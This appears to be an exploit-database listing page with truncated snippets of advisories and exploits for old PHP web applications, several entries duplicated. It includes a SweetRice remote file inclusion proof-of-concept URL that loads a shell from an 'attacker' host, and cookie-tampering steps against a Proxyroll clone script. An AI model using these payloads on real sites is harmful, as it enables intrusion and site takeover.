AutoIndex PHP Script (index.php) Directory Traversal Vulnerability

Exploit for unknown platform in category web applications ================================================================== AutoIndex PHP Script index.php Directory Traversal Vulnerability ================================================================== ? Script: AutoIndex PHP Script ? Languag...

AutoIndex PHP Script - 'index.php' Directory Traversal

============================================================================== ? AutoIndex PHP Script index.php Directory Traversal Vulnerability ============================================================================== ? My home: http://sec-r1z.com ? Script: AutoIndex PHP Script ? Language:...

Proxyroll.com Clone PHP Script Insecure Cookie Handling

Exploit Title: Proxyroll.com Clone PHP Script Cookie Handling And Tamper Data Date: 02.01.2010 Author: DigitALL Thanks: Zombie KroNicKq NoFear and All 1923Turk.biz Members Version: 1.0 Code : This Site Go To /advertise.php and Paypal Buton Click and Firefox Tamper Data Open then a3 = Value...

Proxyroll.com Clone PHP Script Cookie Handling Vulnerability

Exploit for unknown platform in category web applications ============================================================ Proxyroll.com Clone PHP Script Cookie Handling Vulnerability ============================================================ Exploit Title: Proxyroll.com Clone PHP Script Cookie...

Proxyroll.com Clone PHP Script - Insecure Cookie Handling

Exploit Title: Proxyroll.com Clone PHP Script Cookie Handling And Tamper Data Date: 02.01.2010 Author: DigitALL Thanks: Zombie KroNicKq NoFear and All 1923Turk.biz Members Version: 1.0 Code : This Site Go To /advertise.php and Paypal Buton Click and Firefox Tamper Data Open then a3 = Value...

barbo91 uploads Upload Shell Vulnerability

No description provided by source. ======================================================================================== | Title : barbo91 uploads Upload Shell Vulnerability | | Author : indoushka | | email : [email protected] | | Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria...

Mini File Host 1.5 - Arbitrary File Upload

Mini File Host 1.5 - Arbitrary File Upload ===================================================================== ========= / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || || =====================================================================...

The Uploader 2.0 Remote File Upload Vulnerability

Exploit for unknown platform in category web applications ================================================= The Uploader 2.0 Remote File Upload Vulnerability =================================================...

PHPhotoalbum Remote File Upload Vulnerability

No description provided by source. || || | || o,7 || . o7 || 4||| ow, : / / . |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| | | | /' \ /'\ /\ \ /'\ /\ \ | | /, \ /\/\L\ \ \ \ ,/\ /\ \ \ \ / | | //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ \ | | \ \ /\ /\ \ \ \ /...

Simplicity oF Upload (1.3.2) Remote File Upload Vulnerability

No description provided by source. Exploit Title: Simplicity oF Upload 1.3.2 Remote File Upload Vulnerability Date: 20-12-2009 Author: Master Mind Software Link: http://www.phpsimplicity.com/scripts.php?id=3 Version: 1.3.2 CVE : N/A Tested on: Windows 2003 Server...

Alqatari group 1.0 5.0 - id SQL Injection

Alqatari group 1.0 5.0 - id SQL Injection 1337h4x0rZ //Rd / / / \ \ ============================================================================== ª Note : Hacker R0x Lamerz Sux ! ============================================================================== ª Alqatari group Version 1.0 == 5.0 id...

OpenX <= 2.8.1 execute arbitrary PHP code-exploits warning-the black bar safety net

Test method: OpenX adserver version 2.8.1 and lower is vulnerable to remote code execution. To be exploited, this vulnerability requires banner / file upload permissions, such as granted to the 'advertiser' and 'administrator' roles. This vulnerability is caused by the insecure file upload...

WordPress Installations Under Brute-Force Attack

There is an ongoing attack against some WordPress implementations that is trying to brute-force the passwords for the administrator accounts on the installations. The attack is being driven by an automated PHP script that tries thousands of possible passwords. The SANS Internet Storm Center has...

GLSA-200911-06 : PEAR Net_Traceroute: Command injection

The remote host is affected by the vulnerability described in GLSA-200911-06 PEAR NetTraceroute: Command injection Pasquale Imperato reported that the $host parameter to the traceroute function in Traceroute.php is not properly sanitized before being passed to exec. Impact : A remote attacker cou...

SweetRice 0.5.3 - Remote File Inclusion

SweetRice 0.5.3 - Remote File Inclusion Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...

SweetRice <= 0.5.3 Remote File Include Vulnerability

Exploit for unknown platform in category web applications ==================================================== SweetRice PoC : http://server/plugin/subscriber/inc/post.php?rootdir=http://attacker/shell.txt??? 0day.today 2018-03-28...

Radio istek scripti 2.5 - Remote Configuration Disclosure

Radio istek scripti 2.5 - Remote Configuration Disclosure turkish radio php script ====================================================== RADIO istek scripti tr Version 2.5 tr Remote config Vulnerability Found by? :? kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site :...

Radio istek scripti 2.5 - Remote Configuration Disclosure

turkish radio php script ====================================================== RADIO istek scripti tr Version 2.5 tr Remote config Vulnerability Found by? :? kurdish hackers team C0ntact : pshela at YaHoo .com Groups : Kurd-Team site : www.kurdteam.org...

CVE-2009-3060

Multiple cross-site scripting XSS vulnerabilities in Joker Board aka JBoard 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the notice parameter to editform.php, 2 the editusermessage parameter to core/editusermessage.php, or 3 the usertitle parameter to...

CVE-2009-3060

Multiple cross-site scripting XSS vulnerabilities in Joker Board aka JBoard 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the notice parameter to editform.php, 2 the editusermessage parameter to core/editusermessage.php, or 3 the usertitle parameter to...